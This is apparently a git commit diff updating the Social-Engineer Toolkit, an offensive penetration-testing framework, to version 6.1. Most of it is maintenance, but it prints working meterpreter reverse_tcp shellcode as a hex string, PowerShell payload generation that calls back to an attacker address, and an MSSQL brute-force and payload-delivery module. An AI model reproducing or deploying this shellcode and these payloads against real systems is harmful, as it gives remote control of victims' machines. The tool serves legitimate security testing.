Update to SET v6.1

2024-12-05 02:29:58 +00:00 · 2014-11-26 11:43:55 -05:00 · 2014-11-26 11:43:55 -05:00 · a23acaa681
commit a23acaa681
parent bc9c690406
3 changed files with 39 additions and 25 deletions
--- a/src/core/setcore.py
+++ b/src/core/setcore.py
@ -230,7 +230,7 @@ def print_error(message):
    print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC

 def get_version():
-    define_version = '6.0.5'
+    define_version = '6.1'
    return define_version

 class create_menu:
@ -262,6 +262,7 @@ def validate_ip(address):
            else:
                print_error("This is not a valid IP address...")
                raise socket.error
+                
        else:
            raise socket_error

@ -802,7 +803,7 @@ def show_banner(define_version,graphic):
 [---]        The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""")         [---]
 [---]        Created by:""" + bcolors.RED+""" David Kennedy """+bcolors.BLUE+"""("""+bcolors.YELLOW+"""ReL1K"""+bcolors.BLUE+""")         [---]
 [---]                 Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+"""                     [---]
-[---]             Codename: '""" + bcolors.YELLOW + """Rebellion""" + bcolors.BLUE + """'                [---]
+[---]            Codename: '""" + bcolors.YELLOW + """Family Rootz""" + bcolors.BLUE + """'              [---]
 [---]        Follow us on Twitter: """ + bcolors.PURPLE+ """@TrustedSec""" + bcolors.BLUE+"""         [---]
 [---]        Follow me on Twitter: """ + bcolors.PURPLE+ """@HackingDave""" + bcolors.BLUE+"""        [---]
 [---]       Homepage: """ + bcolors.YELLOW + """https://www.trustedsec.com""" + bcolors.BLUE+"""       [---]
@ -1235,6 +1236,7 @@ def generate_powershell_alphanumeric_payload(payload,ipaddr,port, payload2):

    # generate our shellcode first
    shellcode = metasploit_shellcode(payload, ipaddr, port)
+    if not "reverse_http" or "reverse_https" in payload:
        shellcode = shellcode_replace(ipaddr, port, shellcode).rstrip()
        # sub in \x for 0x
        shellcode = re.sub("\\\\x", "0x", shellcode)
@ -1349,7 +1351,6 @@ def metasploit_shellcode(payload, ipaddr, port):

    # if we are using reverse meterpreter tcp
    if payload == "windows/meterpreter/reverse_tcp":
-        #shellcode = r"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xff\xfe\xfd\xfc\x68\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3"
        shellcode = r"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xff\xfe\xfd\xfc\x68\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3"

    # reverse https requires generation through msfvenom
--- a/src/fasttrack/mssql.py
+++ b/src/fasttrack/mssql.py
@ -1,6 +1,7 @@
 #!/usr/bin/python
 from src.core.setcore import *
-from impacket import tds
+#from impacket import tds
+import src.core.tds as tds
 import sys
 import subprocess
 import socket
@ -11,6 +12,7 @@ import binascii
 import base64
 import shutil

+
 #
 # this is the mssql modules
 #
@ -21,6 +23,17 @@ operating_system = check_os()

 msf_path = meta_path()

+try:
+    from impacket import tds
+except ImportError:
+    if os.path.isdir("/usr/share/pyshared/impacket"):
+        sys.path.append("/usr/share/pyshared/impacket")
+        import tds
+        sys.path.append(definepath)
+
+    else:
+        print "[!] Impacket is not installed. This menu will not work."
+        sys.exit()
 #
 # this is the brute forcer
 #
@ -105,7 +118,7 @@ def deploy_hex2binary(ipaddr,port,username,password):
    if match:
        print_status("Powershell was detected on the remote system.")
        option_ps = raw_input("Do you want to use powershell injection? [yes/no]:")
-        if option_ps == "" or option_ps == "y" or option_ps == "yes":
+        if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes":
            option = "1"
            print_status("Powershell delivery selected. Boom!")
        else: option = "2"
--- a/src/teensy/powershell_shellcode.py
+++ b/src/teensy/powershell_shellcode.py
@ -134,7 +134,7 @@ Keyboard.send_now();
 }
 """)
 print "[*] Payload has been extracted. Copying file to %s/reports/teensy.pde" % (setdir)
-if not os.path.isfile(setdir + "/reports/"):
+if not os.path.isdir(setdir + "/reports/"):
    os.makedirs(setdir + "/reports/")
 filewrite = file(setdir + "/reports/teensy.pde", "w")
 filewrite.write(teensy)